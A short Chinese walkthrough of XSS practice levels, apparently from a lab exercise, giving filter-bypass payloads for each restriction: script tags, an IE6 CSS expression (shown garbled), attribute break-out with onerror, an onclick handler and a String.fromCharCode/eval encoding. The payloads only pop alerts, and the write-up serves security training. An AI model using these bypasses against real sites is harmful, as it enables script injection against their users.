無安全方面的限制,直接使用
<script>alert(/xss/);</script>
限制條件:只能使用CSS,不允許使用html標籤
我們知道利用expression可以用來構造XSS,但是只能在IE下面測試,所以下面的測試請在IE6中執行。
body { black; xss:alert(/xss/));/*IE6下測試*/ }
限制條件:對HTML進行了轉義,Image標籤可用。
測試輸入的字符會被插入到src地址中,那麼可以使用僞協議來繞過。
直接輸入
alert( /xss/);
或者你也可以使用事件來繞過,注意閉合語句即可,如下:
1" onerror=alert(/xss/); var a="1
限制條件:使用了關鍵字過濾。
我測試了一下,大部分都過濾了,有部分未過濾,經測試script/onerror過濾了,但是onclick未過濾,使用onclick事件繞過
<img src=# onclick=alert(/xss/);>
限制條件:使用addslashes對特徵字符進行了轉義
也就是說我們的XSS語句中不能出現單引號,雙引號等等特徵字符。
直接使用
<script>alert(/xss/);</script>
即可繞過
或者使用String.fromCharCode方法,如下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>